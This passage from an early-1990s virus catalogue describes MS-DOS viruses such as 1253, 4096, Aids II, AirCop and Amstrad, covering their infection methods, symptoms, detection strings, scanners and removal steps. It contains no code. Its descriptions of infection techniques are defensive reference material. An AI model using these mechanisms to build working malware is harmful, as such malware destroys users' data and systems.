 Symptoms:    TSR; BSC; COMMAND.COM & .COM file growth; partition table change
 Origin:      Austria
 Eff Length:  1,253 Bytes
 Type Code:   PRsBCKX - Parasitic Resident .COM & Partition Table Infector
 Detection Method:  ViruScan V66+, Pro-Scan 2.01+
 Removal Instructions: Pro-Scan 2.01+, Scan/D plus MDisk/P
 General Comments:
       The 1253 Virus was submitted in August 1990.  It is believed to have
       originated in (or at least to have been first isolated in) Austria.
       1253 is a generic infector of .COM files, including COMMAND.COM.
       It also infects the boot sector of diskettes and the partition table
       of hard disks.

       The first time a program infected with the 1253 Virus is executed, the
       virus will install itself memory resident as a low system memory TSR.
       The TSR will be 2,128 bytes in length, hooking interrupts 08, 13, 21,
       and 60.  Total system memory will remain unchanged, and free memory
       will decrease by 2,128 bytes.  At this time, the partition table of
       the system's hard disk is infected with the 1253 virus.  If the
       infected program was executed from a diskette, the diskette's boot
       sector will also be infected.

       Each time a .COM file is executed with the virus resident in memory,
       the .COM file will be infected if it hasn't previously been infected.
       The 1253 Virus appends its viral code to the end of the .COM file, and
       then changes the first few bytes of the program to be a jump to the
       appended code.  Infected files increase in length by 1,253 bytes, and
       the virus makes no attempt to hide the increase when the directory
       is displayed.  Infected files will also have their fourth thru sixth
       bytes set to "V-1" (hex 562D31).

       Any diskettes which are accessed while the virus is present in memory
       will have their boot sector infected with this virus.  Newly formatted
       diskettes, likewise, will be infected immediately.

       The 1253 virus is destructive when it activates.  The author of this
       listing was able to get it to activate by setting the system date to
       December 24 and then executing an infected program on drive A:.  The
       virus promptly went and overwrote the entire diskette in drive
       A: with a pattern of 9 sectors of what appears to be a program
       fragment.  Once the virus has started to overwrite a diskette, the
       only way to stop the disk activity is to power off the system.

       The virus in the partition table and/or diskette boot sector is of
       special note.  When the system is booted from the hard disk or diskette
       with the virus in the partition table or boot sector, the virus will
       install itself memory resident.  At this time, the virus resides above
       the top of system memory but below the 640K DOS boundary.  The change
       in total system memory and available free memory will be 77,840 bytes.
       It can be seen with the CHKDSK command.  At this time, any .COM program
       executed will be infected with the 1253 virus, even though no programs
       on the hard disk may contain this virus before the system boot occurred.

       One effect of this virus, once the system has been booted from an
       infected hard drive or floppy is that the FORMAT command may result
       in unexpected disk activity to inactive drives.  For example, on the
       author's system, when formatting a diskette in drive A: with the
       current drive being drive C:, there was always disk activity to drive
       B:.

       Disinfecting the 1253 virus required that besides disinfecting or
       deleting infected .COM programs, the hard disks partition table and the
       boot sector of any diskettes exposed to the infected system must be
       disinfected.  The virus can be removed safely from the partition table
       and diskette boot sectors by using MDisk with the /P option after
       powering off the system and rebooting from a write-protected uninfected
       boot diskette.  If the partition table and diskette boot sectors are
       not disinfected, the system will promptly experience reinfection of
       .COM files with the virus following a system boot from the hard disk
       or diskette.  Disinfecting the partition table and boot sectors, when
       done properly, will also result in the system's full memory again being
       available.

       It is unknown if there are other activation dates for this virus, or
       if it will overwrite the hard disk if an infected program is executed
       on December 24 from the hard disk.


 Virus Name:  1260
 Aliases:     V2P1
 V Status:    Research
 Discovery:   January, 1990
 Symptoms:    .COM file growth
 Origin:      Minnesota, USA
 Eff Length:  1,260 Bytes
 Type Code:   PNC - Parasitic Encrypting Non-Resident .COM Infector
 Detection Method:  ViruScan V57+, IBM Scan, Pro-Scan 1.4+, F-Prot 1.12+,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: CleanUp V57+, Pro-Scan 1.4+, F-Prot 1.12+, VirHunt 2.0+
 General Comments:
       The 1260 virus was first isolated in January, 1990.  This
       virus does not install itself resident in memory, but is it
       extremely virulent at infecting .COM files.  Infected files
       will have their length increased by 1,260 bytes, and the
       resulting file will be encrypted.  The encryption key changes
       with each infection which occurs.

       The 1260 virus is derived from the original Vienna Virus, though
       it is highly modified.

       This virus was developed as a research virus by Mark Washburn, who
       wished to show the anti-viral community why identification string
       scanners do not work in all cases.  The encryption used in 1260 is
       one of many possible cases of the encryption which may occur with
       Washburn's later research virus, V2P2.

       Also see: V2P2, V2P6, V2P6Z


 Virus Name:  1381 Virus
 Aliases:
 V Status:    Rare
 Discovery:   June, 1990
 Symptoms:    .EXE growth
 Origin:
 Eff Length:  1,381 Bytes
 Type Code:   PNE - Parasitic Non-Resident .EXE Infector
 Detection Method:  ViruScan V64+, Pro-Scan 2.01+
 Removal Instructions:  Scan/D, or Delete infected files
 General Comments:
       The 1381 Virus was isolated in June, 1990.  It is a non-resident
       generic .EXE infector.

       Each time a program infected with the 1381 Virus is executed, the
       virus will attempt to infect one other .EXE file on the current
       drive.  An .EXE file will only be infected if it is greater than
       1,300 bytes in length before infection.  After infection, files
       will have increased in length by between 1,381 and 1,389 bytes.

       The virus can be found at the end of infected files.  Infected
       files will also contain the following text strings:

              "INTERNAL ERROR 02CH.
               PLEASE CONTACT YOUR HARDWARE MANUFACTURER IMMEDIATELY !
               DO NOT FORGET TO REPORT THE ERROR CODE !"

       It is currently unknown what the 1381 Virus does, or what prompts
       it to display the above message.


 Virus Name:  1392
 Aliases:     Amoeba Virus
 V Status:    Rare
 Discovery:   March, 1990
 Symptoms:    TSR, .COM & .EXE growth, dates modified
 Origin:      Indonesia
 Eff Length:  1,392 Bytes
 Type Code:   PRA - Parasitic Resident .COM & .EXE Infector
 Detection Method: ViruScan V61+, VirexPC 1.1+, F-Prot 1.12+, VirHunt 2.0+
 Removal Instructions: Scan/D, F-Prot 1.12+, VirHunt 2.0+,
              or delete infected files
 General Comments:
       The 1392, or Amoeba, Virus was first isolated in Indonesia in
       March 1990.  The 1392 virus is a memory resident virus that infects
       .COM and .EXE files, including COMMAND.COM.  As files are infected,
       their creation/modification date is changed to the date the files
       were infected.

       This virus does not appear to cause any destructive damage.

       The following message appears in the virus, which is where its
       alias of Amoeba was derived from:

              "SMA KHETAPUNK - Nouvel Band A.M.O.E.B.A"
 

 Virus Name:  1554
 Aliases:     Ten Bytes, 9800:0000 Virus, V-Alert, 1559
 V Status:    Rare
 Discovery:   February, 1990
 Symptoms:    .COM & .EXE growth, TSR, linkage corruption, system hang
 Origin:      
 Eff Length:  1,554 Bytes
 Type Code:   PRfAK - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V58+, IBM Scan, Pro-Scan 1.4+, VirexPC 1.1+,
              AVTK 3.5+, F-Prot 1.12+, VirHunt 2.0+
 Removal Instructions: Scan/D, F-Prot 1.12+, VirHunt 2.0+, Pro-Scan 2.01+
 General Comments:
       The 1554 virus was accidently sent out over the VALERT-L network
       on February 13, 1990 to approximately 600 subscribers.  When a
       program is executed that is infected with the 1554 virus, the
       virus installs itself memory resident.  It will then proceed to
       infect .COM over 1000 bytes in length and .EXE files over 1024 bytes
       in length, including COMMAND.COM, increasing their length after
       infection by 1,554 to 1,569 bytes.

       The 1554 virus activates in September, October, November, or
       December of any year.  Upon activation, any files which are written
       will be missing the first ten bytes.  At the end of these files,
       ten bytes of miscellaneous characters will appear.  In effect, both
       programs and data files will be corrupted.

       If the 1554 Virus is executed on a system with less than 640K of
       system memory, the virus will hang the system.


 Virus Name:  1575
 Aliases:     1577, 1591
 V Status:    New
 Discovery:   January, 1991
 Symptoms:    .COM & .EXE growth; decrease in total system & available memory;
              Sluggishness of DIR commands; file date/time changes
 Origin:      Taiwan
 Isolated:    Ontario, Canada
 Eff Length:  1,575 Bytes
 Type Code:   PRfAk - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, Clean-Up V74+, or Delete infected files
 General Comments:
       The 1575 virus was first isolated in Ontario, Canada, in January, 1991.
       This virus has been widely reported, and is believed to be from the Far
       East, probably Taiwan.  It is a memory resident infector of .COM and
       .EXE files, and will infect COMMAND.COM.

       When the first program infected with the 1575 Virus is executed, the
       virus will install itself memory resident in 1,760 to 1,840 bytes at
       the top of system memory, but below the 640K DOS boundary.  This
       memory is not reserved, and may be overwritten later by another
       program.  Interrupt 21 will be hooked by the virus.  COMMAND.COM on
       the system C: drive root directory will also be infected at this
       time.

       Once the 1575 Virus is memory resident, it will infect one .COM and
       one .EXE program on the current drive whenever a DOS Dir or Copy
       command is executed.  This virus does not spread when programs are
       executed.

       Infected files will have their file date and time in the DOS directory
       updated to the system date and time when the infection occurred.
       Their file lengths will also show an increase of between 1,577 and
       1,591 bytes.  This virus will be located at the end of infected files.

       It is not know if 1575 does anything besides replicate.

       Known variant(s) of the 1575 Virus are:
       1575-B : This variant is functionally similar to the 1575 Virus
                described above.  The major difference is that this variant
                reserves the memory it occupies at the top of system memory,
                though the interrupt 12 return is not moved.


 Virus Name:  1605
 Aliases:
 V Status:    Rare
 Discovery:   September, 1990
 Symptoms:    .COM & .EXE growth; TSR; system slowdown
 Origin:      Unknown
 Eff Length:  1,605 Bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V67+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The 1605 Virus was uploaded to John McAfee's Homebase BBS by an
       anonymous user in September, 1990.  The origin of this virus is
       unknown.  The 1605 Virus is a memory resident infector of .COM
       and .EXE files, and it does not infect COMMAND.COM.  It is based
       roughly on the Jerusalem B Virus.

       The first time a program infected with the 1605 Virus is executed,
       the virus will install itself memory resident as a low system memory
       TSR of 1,728 bytes.  Interrupts 13 and 21 will be hooked by the
       virus.  At this time, the system will slowdown by approximately
       15-20%.

       After becoming memory resident, any .COM or .EXE file executed will
       be infected by the virus.  .COM files will increase in size by
       1,605 bytes in all cases with the virus's code being located at the
       beginning of the file.  .EXE files will increase in size by between
       1,601 and 1,610 bytes with the virus's code being located at the
       end of the infected file.

       Other than replicating, it is unknown if this virus carries any
       damage potential.


 Virus Name:  1704 Format
 Aliases:
 V Status:    Rare
 Discovery:   January, 1989
 Symptoms:    TSR, Falling letters, .COM growth, formatted disk
 Origin:      
 Eff Length:  1,704 Bytes
 Type Code:   PRC - Parasitic Encrypting Resident .COM Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVKT 3.5+, VirHunt 2.0+
 Removal Instructions: CleanUp, Scan/D, F-Prot, Pro-Scan, VirexPC, VirHunt 2.0+
 General Comments:
       Like the Cascade Virus, but the disk is formatted when the
       virus activates.  Activation occurs during the months of
       October, November, and December of any year except 1993.

 
 Virus Name:  1720
 Aliases:     PSQR Virus
 V Status:    Rare
 Discovery:   March, 1990
 Symptoms :   TSR, .COM & .EXE growth, partition table damage on activation,
              programs on diskette deleted on Friday The 13ths
 Origin:      Spain
 Eff Length:  1,720 Bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method: ViruScan V61+, VirexPC 1.1+, F-Prot 1.12+, VirHunt 2.0+,
              Pro-Scan 2.01+
 Removal Instructions: Scan /D, VirHunt 2.0+, or delete infected files
 General Comments:
       The 1720, or PSQR Virus, is a variant of the Jerusalem Virus which
       was first isolated in Barcelona, Spain, in March 1990.  This virus,
       infects .COM and .EXE files, though unlike Jerusalem, it does not
       infect Overlay files.  COMMAND.COM will also not be infected.

       The first time an infected file is executed, the virus will install
       itself memory resident, and then infect each executable file as it
       is run.

       On Friday The 13ths, the 1720 Virus will activate the first time an
       infected program is executed.  When the program is executed, it will
       be deleted from disk.  More damaging, however, is that the 1720 virus
       will check to see if the system has a hard disk drive.  If a hard
       disk drive is present, the virus will overwrite the boot sector and
       partition table resulting in all data on the hard disk becoming
       unavailable.  The system will also appear to hang.


 Virus Name:  4096
 Aliases:     Century Virus, FroDo, IDF Virus, Stealth Virus, 100 Years Virus
 V Status:    Common
 Discovery:   January, 1990
 Symptoms:    .COM, .EXE, & overlay file growth; TSR hides growth; crosslinks;
              corruption of data files
 Origin:      Israel
 Eff Length:  4,096 Bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V53+, F-Prot, IBM Scan, Pro-Scan, VirexPC 1.1+,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: CleanUp V62+, Pro-Scan 1.4+, F-Prot, VirHunt 2.0+,
              or see note below
 General Comments:
       The 4096 virus was first isolated in January, 1990.  This virus
       is considered a Stealth virus in that it is almost invisible
       to the system user.

       The 4096 virus infects .COM, .EXE, and Overlay files, adding
       4,096 bytes to their length.  Once the virus is resident in
       system memory, the increase in length will not appear in a
       directory listing.  Once this virus has installed itself into
       memory, it will infect any executable file that is opened,
       including if it is opened with the COPY or XCOPY command.

       This virus is destructive to both data files and executable
       files, as it very slowly crosslinks files on the system's
       disk.  The crosslinking occurs so slowly that it appears there
       is a hardware problem, the virus being almost invisible.  The
       crosslinking of files is the result of the virus manipulating
       the FATs, changing the number of available sectors, as well as
       the user issuing CHKDSK/F commands which will think that the
       files have lost sectors or crosslinking if the virus is in
       memory.

       As a side note, if the virus is present in memory and you
       attempt to copy infected files, the new copy of the file will
       not be infected with the virus if the new copy does not have
       an executable file extension.  Thus, one way to disinfect
       a system is to copy off all the infected files to diskettes with a
       non-executable file extension (ie. don't use .EXE, .COM, .SYS, etc)
       while the virus is active in memory, then power off the system
       and reboot from a write protected (uninfected) system disk.
       Once rebooted and the virus is not in memory, delete the
       infected files and copy back the files from the diskettes to the
       original executable file names and extensions.

       The above will disinfect the system, if done correctly, but
       will still leave the problem of cross-linked files which are
       permanently damaged.

       On or after September 22 of any year, the 4096 virus will hang
       infected systems.  This appears to be a "bug" in the virus in that
       it goes into a time consuming loop.

       The 4096 virus also contains a boot-sector within its code, however,
       it is never written out to the disk's boot sector.  Moving this
       boot sector to the boot sector of a diskette and rebooting the
       system will result in the message "FRODO LIVES" being displayed.
       September 22 is Bilbo and Frodo Baggin's birthday in the Lord Of
       The Rings trilogy.

       An important note on the 4096 virus: this virus will also infect some
       data files.  When this occurs, the data files will appear to be fine
       on infected systems.  However, after the system is later disinfected,
       these files will now be corrupted and unpredictable results may occur.

       Known variant(s) of the 4096 virus include:
       4096-B    : Similar to the 4096 virus, the main change is that the
                   encryption mechanism has been changed in order to avoid
                   detection.
       4096-C    : Isolated in January, 1991, this variant of 4096 is similar
                   to the original virus.  The major difference is that the
                   DOS ChkDsk command will not show any cross-linking of files
                   or lost clusters.  A symptom of infection by this variant
                   is that the disk space available according to a DIR command
                   will be more than the disk space available according to the
                   DOS ChkDsk program.


 Virus Name:  4870 Overwriting
 Aliases:
 V Status:    New
 Discovery:   February, 1991
 Origin:      Unknown
 Symptoms:    Programs fail to execute; Program corruption
 Eff Length:  4,870 Bytes
 Type Code:   ONAK - Overwriting Non-Resident .COM & .EXE Infector
 Detection Method:
 Removal Instructions: Delete infected files
 General Comments:
       The 4870 Overwriting Virus was isolated in February, 1991.  It's origin
       or isolation point is not known.  This virus is a non-resident direct
       action virus that infects .COM and .EXE programs, including
       COMMAND.COM.

       When a program infected with the 4870 Overwriting Virus is executed,
       the virus will search the current directory for an uninfected .COM or
       .EXE file.  The first such uninfected file located will be infected
       by the virus.  Infected programs will have the first 4,870 bytes of
       the candidate program overwritten by the virus.  If the program's
       original length was 4,870 bytes or more, there will be no increase in
       the file length in the DOS directory.  If the program's original
       length was less than 4,870 bytes, then the program's length in the DOS
       directory will now be 4,870 bytes.  The file's date and time in the
       directory will not be altered.

       Programs infected with the 4870 Overwriting Virus will not execute
       properly.  Once the virus checked for a program to infect, and infected
       the candidate program if one was found, the virus will terminate and
       return the user to a DOS prompt.

       A side note on this virus: the virus itself is compressed with the
       LZEXE utility, which accounts for much of the 4,870 bytes of viral code.
       Programs infected with this virus will have the markers of LZEXE version
       .91 found in the first 4,870 bytes of the infected program.

       It is not possible to disinfect programs infected with the 4870
       Overwriting Virus as the first 4,870 bytes of the original program
       are lost.  Infected programs must be deleted or erased, then replaced
       with clean copies.


 Virus Name:  5120
 Aliases:     VBasic Virus, Basic Virus
 V Status:    Rare
 Discovery:   May, 1990
 Origin:      West Germany
 Symptoms:    .COM & .EXE growth, file corruption, unexpected disk activity
 Eff Length:  5,120 Bytes
 Type Code:   PNAK - Parasitic Non-Resident .COM & .EXE Infector
 Detection Method:  ViruScan/X V67+, Pro-Scan 1.4+, F-Prot 1.12+
 Removal Instructions: Scan/D/X, Pro-Scan 1.4+, F-Prot 1.12+, Pro-Scan 2.01+,
              or Delete infected files
 General Comments:
       The 5120 Virus was first isolated in May, 1990.  It is a non-
       resident generic file infector, infecting .COM and .EXE files,
       including COMMAND.COM.  This virus is was written in compiled Turbo
       Basic with some assembly language.

       When an infected file is executed, the 5120 virus will infect one
       .COM and one .EXE file on the current drive and directory, followed
       by attempting to infect one randomly selected .COM or .EXE file in
       each directory on the system's C: drive.  Infected .COM files increase
       in length by 5,120 bytes.  .EXE files infected by the 5120 Virus will
       increase in length by between 5,120 and 5,135 bytes.

       Unlike most of the MS-DOS viruses, the 5120 Virus does not intercept
       disk write errors when attempting to infect programs.  Thus, infected
       systems may notice disk write error messages when no access should be
       occurring for a drive, such as the C: hard disk partition.

       Data files may become corrupted on infected systems, as well as
       crosslinking of files may occur.

       The following text strings can be found in files infected with the
       5120 virus.  These strings will appear near the end of the file:

               "BASRUN"
               "BRUN"
               "IBMBIO.COM"
               "IBMDOS.COM"
               "COMMAND.COM"
               "Access denied"

       There is one variant of the 5120 Virus which does not contain the
       above strings, but behaves in a very similar manner.  This second
       variant is not indicated here as the author does not have a copy.


 Virus Name:  AIDS
 Aliases:     Hahaha, Taunt, VGA2CGA
 V Status:    Endangered
 Discovery:   1989
 Symptoms:    Message, .COM file corruption
 Origin:      
 Eff Length:  N/A
 Type Code:   ONC - Overwriting Non-Resident .COM Infector
 Detection Method:  ViruScan/X V67+, Pro-Scan, VirexPC 1.1+, AVTK 3.5+
 Removal Instructions:  Scan/D/X, or delete infected .COM files
 General Comments:
       The AIDS virus, also known as the Hahaha virus in Europe and
       referred to as the Taunt virus by IBM, is a generic .COM and
       .EXE file infector.  When the virus activates, it displays the
       message "Your computer now has AIDS", with AIDS covering
       about half of the screen.  The system is then halted, and
       must be powered down and rebooted to restart it.  Since this
       virus overwrites the first 13,952 bytes of the executable program, the
       files must be deleted and replaced with clean copies in order
       to remove the virus.  It is not possible to recover the
       overwritten portion of the program.

       Note: this is NOT the Aids Info Disk/PC Cyborg Trojan.

       Known variant(s) of Aids are:
       Aids B : Very similar to the original Aids Virus, this variant is also
                13,952 bytes in length.  Unlike the original virus, it will
                only infect .COM files, as well as COMMAND.COM, and does not
                activate as the original virus did.  Instead, this variant
                will occasionally issue the following error message:
                "I/O error 99, PC=2EFD
                 Program aborted".
                This variant was received in January, 1991, origin unknown.

 
 Virus Name:  Aids II Virus
 Aliases:     Companion Virus
 V Status:    Endangered
 Discovery:   April, 1990
 Symptoms:    Creates .COM files, melody, message
 Origin:      
 Eff Length:  8,064 Bytes
 Type Code:   SNA - Spawning Non-Resident .COM & .EXE Infector
 Detection Method:  ViruScan/X V67+, Pro-Scan 1.4+
 Removal Instructions: Scan/D/X, or delete corresponding .COM files
 General Comments:
       The Aids II Virus, or Companion Virus, was isolated for the first
       time in April 1990.  Unlike other generic file infectors, the
       Aids II Virus is the first known virus to employ what could be
       termed a "corresponding file technique" of infection so that the
       original target .EXE file is never changed.  The virus takes
       advantage of the DOS feature where if a program exists in both
       .COM and .EXE form, the .COM file will be executed.

       The Aids II Virus does not directly infect .EXE files, instead it
       stores a copy of the virus in a corresponding .COM file which will
       be executed when the user tries to execute one of his .COM files.
       The .EXE file, and the .COM file containing the viral code will
       both have the same base file name.

       The method of infection is as follows:  when an "infected"
       program is executed, since a corresponding .COM file exists, the
       .COM file containing the viral code is executed.  The virus
       first locates an uninfected .EXE file in the current directory and
       creates a corresponding (or companion) .COM file with the viral
       code.  These .COM files will always be 8,064 Bytes in length with
       a file date/time of the date/time of infection.  The .EXE file is
       not altered at all.  After creating the new .COM file, the virus
       then plays a melody and displays the following message, the "*"
       indicated below actually being ansi heart characters:

                 "Your computer is infected with ...

                           * Aids Virus II *

                  - Signed WOP & PGT of DutchCrack -"

       The Aids II Virus then spawns to the .EXE file that was attempting
       to be executed, and the program runs without problem.  After
       completion of the program, control returns to the Aids II Virus.
       The melody is played again with the following message displayed:

                        "Getting used to me?

                    Next time, use a Condom ....."

       Since the original .EXE file remains unaltered, CRC checking
       programs cannot detect this virus having infected a system.

       One way to manually remove the Aids II Virus is to check the
       disk for programs which have both a .EXE and a .COM file, with
       the .COM file having a length of 8,064 bytes.  The .COM files
       thus identified should be erased.

       The displayed text strings do not appear in the viral code.


 Virus Name:  AirCop
 Aliases:
 V Status:    Rare
 Discovery:   July, 1990
 Isolated:    Washington, USA
 Symptoms:    BSC; System Halt; Message; decrease in system and free memory
 Origin:      Taiwan
 Eff Length:  N/A
 Type Code:   FR - Resident Floppy Boot Sector Infector
 Detection Method:  ViruScan V66+, Pro-Scan 2.01+
 Removal Instructions:  MDisk or DOS SYS command
 General Comments:
       The AirCop Virus was discovered in the State of Washington in the
       United States in July, 1990.  Some early infections of this virus,
       however, have been traced back to Taiwan, and Taiwan is probably where
       it originated.  AirCop is a boot sector infector, and it will only
       infect 360K 5.25" floppy diskettes.

       When a system is booted from a diskette which is infected with the
       AirCop virus, the virus will install itself memory resident.  The
       AirCop Virus installs itself memory resident at the top of high system
       memory.  The system memory size and available free memory will
       decrease by 1,024 bytes when the AirCop virus is memory resident.
       AirCop hooks interrupt 13.

       Once AirCop is memory resident, any non-write protected diskettes
       which are then accessed will have their boot sector infected with
       the AirCop virus.  AirCop will copy the original disk boot sector
       to sector 719 (Side 1, Cyl 39, Sector 9 on a normal 360K 5.25"
       diskette) and then replace the boot sector at sector 0 with a copy
       of the virus.  If a boot sector of a diskette infected with the
       AirCop virus is viewed, it will be missing almost all of the messages
       which normally appear in a normal boot sector.  The only message
       remaining will be:

               "Non-system..."

       This will be located just before the end of the boot sector.

       The AirCop Virus will do one of two things on infected systems,
       depending on how compatible the system's software and hardware is
       with the virus.  On most systems, the virus will display the following
       message at random intervals:

               "Red State, Germ Offensive.
                AIRCOP."

       On other systems, the virus being present will result in the system
       receiving a Stack Overflow Error and the system being halted.  In this
       case, you must power off the system in order to be able to reboot.

       AirCop currently does not infect hard disk boot sectors or partition
       tables.

       AirCop can be removed from infected diskettes by first powering
       off the system and rebooting from a known clean write protected
       DOS master diskette.  The DOS SYS command should then be used to
       replace the infected diskette's boot sector.  Alternately, MDisk
       can be used following the power-down and reboot.


 Virus Name:  Akuku
 Aliases:
 V Status:    New
 Discovery:   January, 1991
 Symptoms:    .COM & .EXE growth; "Error in EXE file" message;
              Unexpected drive accesses
 Origin:      USSR
 Eff Length:  891 Bytes
 Type Code:   PNAK - Parasitic Non-Resident .COM & .EXE Infector
 Detection Method:  ViruScan V74+
 Removal Instructions:  Scan/D, or Delete infected files
 General Comments:
       The Akuku Virus was isolated in January, 1991, and comes from the
       USSR.  This virus is a non-resident direct action infector of .COM and
       .EXE files, including COMMAND.COM.

       When a program infected with Akuku is executed, the virus will infect
       three programs in the current directory.  If three uninfected programs
       cannot be found in the current directory, the virus will search the
       disk directory of the current drive, as well as of the C: drive.
       Both .COM and .EXE programs may become infected, as well as COMMAND.COM.
       Programs smaller than 1K will not be infected by this virus.  Infected
       programs will increase in length by 891 to 907 bytes, the virus will be
       located at the end of the infected file.  The file date and time in the
       disk directory will not be altered by the virus.

       The following text string is contained within the virus's code, and
       can be found in all infected programs:

               "A kuku, Nastepny komornik !!!"

       Some .EXE programs will fail to execute properly after infection by the
       Akuku Virus.  These programs may display an "Error in EXE file"
       message and terminate when the user attempts to execute them.


 Virus Name:  Alabama
 Aliases:
 V Status:    Endangered
 Discovery:   October, 1989
 Symptoms:    .EXE growth, Resident (see text), message, FAT corruption
 Origin:      Israel      
 Eff Length:  1,560 bytes
 Type Code:   PRfET - Parasitic Resident .EXE infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions:  CleanUp, F-Prot, Pro-Scan 1.4+, Scan/D/X, VirHunt 2.0+,
              or delete infected files
 General Comments:
       The Alabama virus was first isolated at Hebrew University in
       Israel by Ysrael Radai in October, 1989.  Its first known
       activation was on October 13, 1989.  The Alabama virus will
       infect .EXE files, increasing their size by 1,560 bytes.  It
       installs itself memory resident when the first program infected
       with the virus is executed, however it doesn't use the normal
       TSR function.  Instead, this virus hooks Int 9 as well as making
       use of IN and OUT commands.  When a CTL-ALT-DEL combination is
       detected, the virus causes an apparent boot but remains in RAM.
       The virus loads itself 30K under the highest memory location
       reported by DOS, and does not lower the amount of memory
       reported by BIOS or DOS.

       After the virus has been memory resident for one hour, the
       following message will appear in a flashing box:

       "SOFTWARE COPIES PROHIBITED BY INTERNATIONAL LAW..............
        Box 1055 Tuscambia ALABAMA USA."

       The Alabama virus uses a complex mechanism to determine whether
       or not to infect the current file.  First, it checks to see if
       there is an uninfected file in the current directory, if there
       is one it infects it.  Only if there are no uninfected files
       in the current directory is the program being executed
       infected.  However, sometimes instead of infecting the
       uninfected candidate file, it will instead manipulate the FATs
       to exchange the uninfected candidate file with the currently
       executed file without renaming it, so the user ends up thinking
       he is executing one file when in effect he is actually
       executing another one.  The end result is that files are
       slowly lost on infected systems.  This file swapping occurs
       when the virus activates on ANY Friday.


 Virus Name:  Alameda
 Aliases:     Merritt, Peking, Seoul, Yale
 V Status:    Rare
 Discovery:   1987
 Symptoms:    Floppy boot failures, Resident-TOM, BSC
 Origin:      California, USA
 Eff Length:  N/A
 Type Code:   RtF - Resident Floppy Boot Sector Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, AVTK 3.5+, VirHunt 2.0+
 Removal Instructions:  MDisk, CleanUp, F-Prot, or DOS SYS
 General Comments:
       The Alameda virus was first discovered at Merritt college in
       Alameda, California in 1987.  The original version of this virus
       caused no intentional damage, though there is now at least 1
       variant of this virus that now causes floppy disks to become
       unbootable after a counter has reached its limit (Alameda-C
       virus).

       The Alameda virus, and its variants, all replicate when the
       system is booted with a CTL-ALT-DEL and infect only 5 1/4"
       360K diskettes.  These viruses do stay in memory thru a warm
       reboot, and will infect both system and non-system disks.
       System memory can be infected on a warm boot even if Basic is
       loaded instead of DOS.

       The virus saves the real boot sector at track 39, sector 8,
       head 0.  The original version of the Alameda virus would only
       run on a 8086/8088 machine, though later versions can now run
       on 80286 systems.

       Also see: Golden Gate, SF Virus
 

 Virus Name:  Ambulance Car Virus
 Aliases:     RedX
 V Status:    Rare
 Discovery:   June, 1990
 Symptoms:    .COM growth, graphic display & sound
 Origin:      West Germany
 Eff Length:  796 Bytes
 Type Code:   PNC - Parasitic Non-Resident .COM Infector
 Detection Method: ViruScan V64+, F-Prot 1.12+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete infected files
 General Comments:
       The Ambulance Car Virus was isolated in West Germany in June, 1990.
       This virus is a non-resident .COM infector.

       When a program infected with the Ambulance Car Virus is executed,
       the virus will attempt to infect one .COM file.  The .COM file to
       be infected will be located on the C: drive.  This virus only infects
       one .COM file in any directory, and never the first .COM file in
       the directory.  It avoids infecting COMMAND.COM as that file is
       normally the first .COM file in the root directory.

       On a random basis, when an infected file is executed it will
       have the affect of a graphics display of an ASCII block drawing of
       an ambulance moving across the bottom of the system display.  This
       graphics display will be accompanied with the sound of a siren
       played on the system's speaker.  Both of these effects only occur
       on systems with a graphics capable display adapter.
 

 Virus Name:  Amstrad
 Aliases:
 V Status:    Endangered
 Discovery:   November, 1989
 Symptoms:    .COM growth, message
 Origin:      Portugal
 Eff Length:  847 Bytes
 Type Code:   PNC - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC 1.1+,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions:  Scan/D/X, F-Prot, Pro-Scan 1.4+, or
              delete infected files
 General Comments:
       The Amstrad virus was first reported in November, 1989, by
       Jean Luz of Portugal, however it has been known of in Spain
       and Portugal for a year prior to that.  The virus is a generic
       .COM infector, but is not memory resident nor does it infect
       COMMAND.COM.

       The virus carries a fake advertisement for the Amstrad computer.

       The Amstrad virus appears to cause no other damage to the
       system other than replicating and infecting files.

       Known variants of the Amstrad Virus are:
       Pixel/V-345 - Similar to the Amstrad virus described above, except
                     that the virus is 345 Bytes in length, can now infect
                     COMMAND.COM, and contains the message:
                     "=!= Program sick error:Call doctor or by PIXEL for
                     cure description".  This message is not displayed.
                     The Pixel virus was originally distributed in Greece
                     by Pixel magazine.  The Pixel Virus can only infect
                     programs in the current directory.  This variant may
                     in fact be the original virus in this family, it is
                     rumored that it was released one year before the
                     appearance of the virus in Portugal.
                     Origin: Greece
       V-277       - Similar to the Pixel/V-345 virus described above, except
                     that the virus is now 277 Bytes in length, and does not
                     contain any message text.  The original message text
                     has been replaced with code to produce a parity error
                     approximately 50% of the time when an infected program
                     is executed.
                     Origin: Bulgaria
       V-299       - Similar to Pixel, except that the length of the virus
                     is 299 Bytes.
                     Origin: Bulgaria
       V-847       - Similar to Pixel, except that the length of the virus
                     is 847 Bytes.
                     Origin: Bulgaria
       V-847B      - Similar to V-847, except that the message in the virus
                     is now in Spanish and is:
                     "=!= En tu PC hay un virus RV1, y esta es su quinta
                     generacion".
                     This variant was originally distributed by a magazine
                     in Spain in file NOCARGAR.COM.
                     Origin: Spain
       V-852       - Similar to the V-847 variant, this variant does not
                     contain any message.  It infects all .COM files in the
                     current directory whenever an infected program is
                     executed.  If the current directory contains COMMAND.COM,
                     it will be infected as well.  The original sample of this
                     variant received by the author did not contain any text,
                     however after replicating on a test system, all infected
                     files then contained text from the video buffer, which
                     implies the submitted sample was the original distribution
                     of the virus.  This variant checks byte 4 of .COM files
                     to determine if the file was previously infected, if
                     bytes 4-5 are 'SS', the virus assumes the file is already
